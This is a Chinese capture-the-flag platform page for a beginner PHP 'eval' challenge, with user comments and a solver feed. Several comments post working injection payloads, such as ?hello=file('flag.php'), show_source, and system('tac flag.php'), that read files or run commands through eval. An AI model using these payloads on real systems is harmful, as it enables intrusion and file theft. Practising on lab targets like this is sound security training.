evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 15301
提  示:
描  述:
eval
评论
permissiondog 3年前

flag: Too Young Too Simple (滑稽

回复 0
kato 3年前

但凡英语不好好学都上当了

回复 1

王曦之啊 3年前

你个糟老头,坏的很

回复 2

LDAx 3年前

`cat flag.php`

回复 0

sn1p3r 3年前

这个题得好好学学

回复 3

juice 3年前

show_source('flag.php')

回复 6

yyt123 3年前

hello=1,$v=file('./flag.php'),print_r($v)

回复 3
yyt123 3年前

@LSYLTH 可以用hello读文件也可以不用,这里随便给hello赋了个值,之后定义了一个变量去读flag.php

回复 0

LSYLTH 3年前

这是怎么构造这个playload的呀

回复 0

你看 3年前

require 一般放在 PHP 文件的最前面,程序在执行前就会先导入要引用的文件; include 一般放在程序的流程控制中,当程序执行时碰到才会引用,简化程序的执行流程。 require 引入的文件有错误时,执行会中断,并返回一个致命错误; include 引入的文件有错误时,会继续执行,并返回一个警告。

回复 3

safemaker2021 3年前

把file函数带进去eval中,以PHP执行

回复 0

Easyoung 3年前

直接在评论里发flag,年轻人不讲武德?

回复 2
sn1p3r 3年前

@harry 看到管理员三个字,熠熠生辉。

回复 1

harry 管理员 3年前

动态flag他们发了也没事

回复 11

xiao 3年前

直接用?hello=file('flag.php'),var_dump()函数可以打印

回复 17
wyx48046 3年前

厉害!

回复 0

Hiiro 3年前

大佬大佬

回复 0

test_ctf 3年前

牛逼!

回复 0

Hacker23 3年前

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 3年前

原理是什么啊???想了解一下

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

504025 攻破了该题 8分钟前
rainfo 攻破了该题 1小时前
288728 攻破了该题 2小时前
yhs123456 攻破了该题 5小时前
1185461366 攻破了该题 7小时前
2568725077 攻破了该题 7小时前
ZZZZM 攻破了该题 9小时前
mayulin 攻破了该题 11小时前
2324248 攻破了该题 11小时前
娄志鑫2324241 攻破了该题 11小时前
jsc111 攻破了该题 11小时前
3353540645 攻破了该题 12小时前
我是鼠鼠 攻破了该题 13小时前
1963444636 攻破了该题 14小时前
13607979046 攻破了该题 16小时前
freestyle 攻破了该题 1天前
xiaoJ 攻破了该题 1天前
ma197 攻破了该题 1天前
02789456 攻破了该题 1天前
没空理你 攻破了该题 1天前
问题反馈